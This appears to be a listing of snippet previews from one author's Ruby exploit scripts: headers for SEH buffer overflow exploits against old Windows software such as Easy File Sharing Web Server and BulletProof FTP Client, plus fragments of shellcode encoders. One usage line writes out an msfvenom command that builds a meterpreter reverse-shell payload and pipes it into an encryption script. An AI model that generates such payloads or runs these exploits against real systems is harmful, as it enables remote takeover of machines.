mfadzilr

require 'rc4'
require 'optparse'

options = {}
optparse = OptionParser.new do |opts|
    opts.banner = "Usage: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.13.1 -f raw | ruby ./rc5-encrypt.rb --key demo"
    options[:key] = nil
    opts.on('-k', '--key KEY', 'encryption key') do |key|
        options[:key] = key
    end

mfadzilr

#!/usr/bin/env ruby
# encoding: ASCII-8BIT

# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow (DEP+ASLR Bypass)
# Date: Jan 05 2016
# Vulnerability Discovery: ArminCyber
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: 7.2
# Tested on: Microsoft Windows 7 x86 [Version 6.1.7601]

mfadzilr

#!/usr/bin/env ruby
# Custom encoder for ADAMView Exploit
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 09/12/2014
# code is ugly

require 'metasm'

@shellcode = Array.new()

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
# Date: Dec 09 2014
# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
# Version: 4.30.003
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-8386
# Advisory ID: CORE-2014-0008

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]

mfadzilr

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 2.7.3.700 2006.09.29 (.wax) Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: ??
# Software Link: not available
# Version: 2.7.3.700 2006.09.29
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]

mfadzilr

#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)

seh = 4104
stackpivot = 88
buf = "A" * 5000

mfadzilr

#!/usr/bin/env ruby
# Author : Muhamad Fadzil Ramli
# 25/10/2014
# Binary to hexcode

# read bin file
fp = File.open(ARGV[0],"rb")

# read and convert to hex format
def readfile(fp)